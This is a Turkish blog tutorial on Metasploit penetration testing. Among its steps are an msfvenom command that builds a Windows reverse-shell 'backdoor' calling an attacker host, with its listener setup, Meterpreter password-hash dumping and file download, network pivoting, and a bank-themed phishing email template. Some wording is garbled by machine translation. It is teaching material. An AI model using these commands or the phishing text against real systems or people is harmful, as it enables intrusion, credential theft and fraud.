Metasploit Çerçevesi: Uygulamalı Penetrasyon Testi

Metasploit Framework: Pratik Bir Penetrasyon Testi Rehberi


Metasploit, siber güvenlik alanında en yaygın kullanılan ve güçlü araçlardan biridir. Bu açık kaynaklı çerçeve, güvenlik uzmanlarına ve etik hackerlara hedef sistemlerdeki zayıflıkları keşfetme ve kullanma yeteneği sağlayarak, penetrasyon testi ve güvenlik açığı değerlendirmesi için kullanılır. 

1. Penetrasyon Testinin Aşamaları

Bir penetrasyon testi genellikle aşağıdaki adımları içerir:
  • Kapsam Tanımı
  • Keşif
  • Keşif
  • Sömürü
  • Sosyal Mühendislik
  • Kontrol Edinimi
  • Pivotlama
  • Kanıt Toplama
  • Raporlama
  • İyileştirme

Kapsam Tanımı

Bir penetrasyon testindeki ilk adım, hangi sistemlerin test edileceğini belirlemektir. Bu aşamada, hedef sistemin sınırları, kritik veriler ve hangi hizmetlerin korunması gerektiği açıklığa kavuşturulmalıdır. Örneğin, bir finans kuruluşunda müşteri verilerini korumak için hangi sistemlerin kritik olduğunu belirlemek esastır.Örnek Senaryo:  Bir bankadaki BT yöneticisi, yalnızca müşteri veritabanlarını içeren sunucunun harici bir penetrasyon testi için test edilmesini ister. Bu durumda, testin kapsamı açıkça tanımlanmalı ve sınırlandırılmalıdır.

Keşif

Bu aşamada hedef hakkında mümkün olduğunca fazla bilgi toplanır. IP adresleri, çalışan bilgileri ve işletim sistemleri gibi ayrıntılar toplanır.Örnek Senaryo:  Bir penetrasyon testçisi şirket yapısı hakkında bilgi toplamak için LinkedIn'deki çalışan profillerini inceler. Ayrıca, şirketin web sitesindeki "Hakkımızda" sayfasından yöneticilerin isimlerini öğrenebilirler.

Keşif

Bu aşamada hedef ağdaki açık portlar ve servisler taranır. Nmap gibi araçlar ağdaki cihazları ve açık portlarını tanımlamak için kullanılır.Örnek Komut:
vuruş
db_nmap -sS -A 192.168.1.0/24
Bu komut belirtilen IP aralığındaki cihazları tarar ve açık portları listeler. Tarama sonuçları hangi hizmetlerin çalıştığını belirlemek ve olası güvenlik açıklarını belirlemek için kullanılabilir.

2. Sömürü

Keşif aşamasından sonra, belirlenen güvenlik açıklarından yararlanmak için uygun istismarlar seçilir. Metasploit'te bulunan istismar modülleri hedef sistemlere saldırmak için kullanılır.

Örnek Senaryo: Windows Arka Kapısı Oluşturma

  1.  Windows arka kapısı oluşturmak için terminalde şunu kullanın  :msfvenom
    vuruş
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f exe -o /root/backdoor.exe
    Bu komut hedef sisteme ters bağlantı kuracak bir yük oluşturur.
  2. Ardından Metasploit konsolunu başlatın:
    vuruş
    msfconsole
  3. Yükü dinleyecek ayarları yapılandırın:
    vuruş
    use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <attacker_ip> set LPORT <attacker_port> exploit
  4. Arka kapı hedefte çalıştırıldığında saldırganın sistemine ters bağlantı kurulacaktır.

3. Sosyal Mühendislik

Sosyal mühendislik teknikleri, bir hedefin güvenlik önlemlerini aşmak için kullanılabilir. Örneğin, kullanıcıları kimlik bilgilerini ifşa etmeleri için kandırmak amacıyla kimlik avı e-postaları gönderilebilir.Örnek Senaryo:  Bir penetrasyon testçisi, çalışanlardan şifrelerini güncellemelerini isteyen sahte bir e-posta gönderir. Güvenilir görünmesi için bankanın logosunu kullanır ve kullanıcıları sahte bir web sitesine yönlendirir.

Kimlik Avı E-posta Örneği

metin
Subject: Urgent Password Update Required! Dear Customer, For your account's security, you must urgently update your password. Please click on the link below to complete this process: [Password Update Link] Thank you, Your Bank Security Team

4. Kontrol Edinimi

Hedef sisteme erişim sağlandığında, çeşitli komutlar kullanılarak kontrol altına alınabilir. Bir Meterpreter oturumu açıldığında, sistemde eylemler gerçekleştirilebilir.Örnek Komutlar:
vuruş
meterpreter > sysinfo meterpreter > hashdump
Komut   hedef sistem hakkında bilgi alırken,   kullanıcı şifrelerini de çıkarabilir.sysinfohashdump

5. Pivotlama

Edinilen erişim kullanılarak, ağın diğer bölümlerine geçmek için pivotlama teknikleri kullanılabilir ve bu sayede ek sistemlere erişim sağlanabilir.

Proxy Pivot Örneği

  1. Tehlikeye atılmış bir ana bilgisayar üzerinden bir proxy pivotu oluşturun:
    vuruş
    use auxiliary/server/socks4a run
  2. Bu proxy aracılığıyla diğer sistemlere bağlantılar kurun:
    vuruş
    proxychains nmap -sS 192.168.2.0/24
Bu, yeni ağ segmentlerinde tarama yapılmasına ve potansiyel güvenlik açıklarının keşfedilmesine olanak tanır.

6. Kanıt Toplama

Penetrasyon testi sırasında elde edilen veriler ve kanıtlar toplanmalıdır. Bu kanıtlar test sonuçlarının belgelenmesi için çok önemlidir.Örnek:  Ekran görüntüsü almak veya dosya indirmek için Meterpreter komutları kullanılabilir:
vuruş
meterpreter > screenshot meterpreter > download /path/to/file
Bu komutlarla elde edilen veriler raporlama sırasında kullanılacaktır.

7. Raporlama ve Düzeltme

Son olarak, penetrasyon testinin sonuçları ayrıntılı bir rapor formatında sunulmalıdır. Rapor, önerilen düzeltmelerle birlikte belirlenen güvenlik açıklarını içermelidir.Rapor İçeriği:
  • Test kapsamı ve yöntemleri.
  • Elde edilen bulgular.
  • Güvenlik açıklarının ciddiyeti.
  • Çözüm önerileri.

Rapor Örneği

metin
Test Scope: ABC Bank Customer Database Server Findings: 1. MS08-067 vulnerability exploited for system access. 2. User passwords obtained. 3. Outdated software detected on system. Remediation Recommendations: 1. Update all software. 2. Increase user training. 3. Review firewall rules.

Çözüm

Metasploit çerçevesi, penetrasyon testi için etkili bir araçtır ve yukarıda belirtilen adımlarla birlikte kullanıldığında güçlü sonuçlar verebilir. Burada sağlanan gerçek dünya senaryoları, penetrasyon testi süreçlerini daha iyi anlamanıza yardımcı olacaktır. Etik hackleme ilkelerine uymanın her zaman bir öncelik olması gerektiğini unutmayın!

Yorum Gönder

Daha yeni Daha eski

İletişim Formu